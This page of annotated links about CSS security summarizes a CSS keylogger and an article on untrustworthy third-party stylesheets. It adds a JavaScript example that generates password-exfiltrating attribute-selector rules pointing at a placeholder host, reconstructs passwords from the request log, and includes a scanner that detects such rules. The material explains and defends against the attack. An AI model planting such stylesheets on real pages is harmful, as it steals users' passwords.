



Topic: #Cascading-Style-Sheets

More Untrustworthy CSS


Taking off from the controversial keylogger implemented in Cascading Style Sheets, this article surveys the various security holes that Web authors sometimes open up by incautiously borrowing or linking to CSS that they have not inspected and vetted.

“Third Party CSS Is Not Safe”
Jake Archibald, February 27, 2018

#Cascading-Style-Sheets #security #trust

Misusing CSS to Capture Passwords As Users Enter Them


Cascading Style Sheets, considered as a domain-specific language, is powerful enough to let a malicious Web designer detect and record the plaintext that users type into the text fields of an interactive Web page. The key idea is an attribute selector such as input[type="password"][value$="a"], paired with a rule that loads the background-image from a URL on a server whose access log the eavesdropper can read. The browser requests that image, and the log entry appears, whenever the value of a password field ends in a lower-case a. With ninety-five such rules, one per printable ASCII character, each loading a distinct image from the eavesdropper's server, the eavesdropper reads off which images were requested and in what order and infers the password from that list. Two caveats limit the attack: the selector tests the element's value attribute, not the live value property, so it fires only when a script or framework mirrors what is typed back into the attribute; and a browser fetches each background image once, so a character that repeats within the password shows up in the log only the first time.

“maxchehab”, GitHub, February 20, 2018

#Cascading-Style-Sheets #keylogging #domain-specific-languages
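The mechanism described in the entry above, together with the kind of vetting that the "Third Party CSS Is Not Safe" entry argues for, as an added example. This is not code from this page, from maxchehab's repository, or from Jake Archibald's article: it generates the ninety-five rules, models what a browser would request while a password is typed (including the attribute-mirroring and image-caching caveats), reads the request log back into characters, and scans a stylesheet for rules of this shape. The origin https://log.example, the /k/ path and all function names are assumed for illustration.

```javascript
// Added example; this is not code from the page or from either linked
// article. It models the attack described above and a check for it.
// The exfiltration origin "https://log.example" is a placeholder.

const EXFIL_ORIGIN = "https://log.example";

// The 95 printable ASCII characters, 0x20 (space) through 0x7E (~).
const PRINTABLE = Array.from({ length: 95 }, (_, i) => String.fromCharCode(0x20 + i));

// Hex code used to name the character in the request path.
function hex(ch) {
  return ch.charCodeAt(0).toString(16).padStart(2, "0");
}

// Escape one character for use inside a double-quoted CSS string. Anything
// that is not alphanumeric becomes a hex escape terminated by a space, so the
// generated selectors never contain raw quotes, backslashes or braces.
function cssEscape(ch) {
  return /[A-Za-z0-9]/.test(ch) ? ch : "\\" + hex(ch) + " ";
}

// Attacker side: one rule per printable character. A rule matches while the
// password field's value attribute ends in that character, and its
// background-image sends a request that names the character.
function keyloggerStylesheet(origin = EXFIL_ORIGIN) {
  return PRINTABLE.map(
    (ch) =>
      `input[type="password"][value$="${cssEscape(ch)}"]` +
      `{background-image:url("${origin}/k/${hex(ch)}")}`
  ).join("\n");
}

// Browser model: returns the request URLs, in order, that typing `password`
// would cause. Two caveats are built in. The selector tests the value
// *attribute*, so this assumes something (e.g. a framework that mirrors input
// state into the attribute) keeps it in sync with the typed text. And the
// browser fetches each background-image URL only once, so a character that
// repeats later in the password produces no second request.
function simulateTyping(password, origin = EXFIL_ORIGIN) {
  const fetched = new Set();
  const requests = [];
  for (const ch of password) {
    if (!PRINTABLE.includes(ch)) continue; // no rule covers this character
    const url = `${origin}/k/${hex(ch)}`;
    if (fetched.has(url)) continue;       // cached: not requested again
    fetched.add(url);
    requests.push(url);
  }
  return requests;
}

// Eavesdropper side: read the ordered request log back into characters.
function reconstructFromLog(urls) {
  let out = "";
  for (const u of urls) {
    const m = /\/k\/([0-9a-f]{2})$/.exec(u);
    if (m) out += String.fromCharCode(parseInt(m[1], 16));
  }
  return out;
}

// Defender side, for vetting third-party CSS: flag every rule whose selector
// keys on a value attribute and whose body loads a remote resource. This is a
// heuristic over a simple rule splitter, not a full CSS parser, and it will
// also catch benign rules that happen to match both tests.
function findValueExfiltrationRules(css) {
  const flagged = [];
  const rule = /([^{}]+)\{([^}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    const body = m[2];
    const keysOnValue = /\[\s*value\s*[\^$*~|]?=/i.test(selector);
    const loadsRemote = /url\(\s*["']?\s*(?:https?:)?\/\//i.test(body);
    if (keysOnValue && loadsRemote) flagged.push(selector);
  }
  return flagged;
}

// Usage: the attack round-trips a password with distinct characters, loses a
// repeated one, and every generated rule is caught by the vetting check.
const generatedCss = keyloggerStylesheet();
console.log(reconstructFromLog(simulateTyping("hunter2")));   // hunter2
console.log(reconstructFromLog(simulateTyping("aab")));       // ab
console.log(findValueExfiltrationRules(generatedCss).length); // 95
```

The vetting check is deliberately coarse: a rule that tests a value attribute and fetches anything from another origin has no legitimate styling purpose on a login form, so a false positive costs a minute of review while a miss costs a password.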


This work is licensed under a Creative Commons Attribution-ShareAlike License.


John David Stone (

created June 1, 2014 · last revised December 10, 2018